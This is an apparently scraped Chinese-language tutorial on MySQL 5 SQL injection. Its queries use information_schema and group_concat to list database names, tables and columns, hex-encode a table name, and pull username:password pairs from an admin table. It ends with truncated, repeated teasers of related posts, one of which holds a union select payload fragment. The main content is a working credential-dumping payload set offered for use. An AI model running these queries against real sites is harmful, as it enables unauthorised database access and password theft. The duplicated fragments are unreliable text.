mysql中的information_schema 結構用來儲存資料庫系統資訊
information_schema 結構中這幾個表儲存的資訊,在注射中可以用到的幾個表。
| schemata ――>儲存資料庫名的,
|——>關鍵字段:schema_name,表示資料庫名稱
| tables ――>儲存表名的
|——>關鍵字段:table_schema表示表所屬的資料庫名稱;
table_name表示表的名稱
| columns ――>儲存欄位名的
|——>關鍵字段:table_schema表示表所屬的資料庫名稱;
table_name表示所屬的表的名稱
column_name表示欄位名
可以看到,我們只要通過注射點構造查詢語句遍相關字段,就可以得到我們想要的資訊了。
爆所有資料名
select group_concat(schemata) from information_schema.schemata
得到當前庫的所有表
select group_concat(table_name) from information_schema.tables where table_schema=database()
得到表中的欄位名 將敏感的表進行16進製制編碼adminuser=0x61646d696e75736572
select group_concat(column_name) from information_schema.columns where table_name=0x61646d696e75736572
得到字段具體的值
select group_concat(username,0x3a,password) from adminuser
mysql5無法注入 mysql5注入
對mysql5注入時,可以直接查詢information schema中的tables表,快速找到所需的表段。同時可以利用group concat函式,得到你想得到的東西,不用limit乙個乙個猜。前面先轉轉別人的東西 and 1 2 union select 1,2,group concat us...
mysql5注入中group concat的使用
mysql中的information schema 結構用來儲存資料庫系統資訊 information schema 結構中這幾個表儲存的資訊,在注射中可以用到的幾個表。schemata 儲存資料庫名的,關鍵字段 schema name,表示資料庫名稱 tables 儲存表名的 關鍵字段 table...
mysql 5注入中group concat的使用
mysql中的information schema 結構用來儲存資料庫系統資訊 information schema 結構中這幾個表儲存的資訊,在注射中可以用到的幾個表。schemata 儲存資料庫名的,關鍵字段 schema name,表示資料庫名稱 tables 儲存表名的 關鍵字段 table...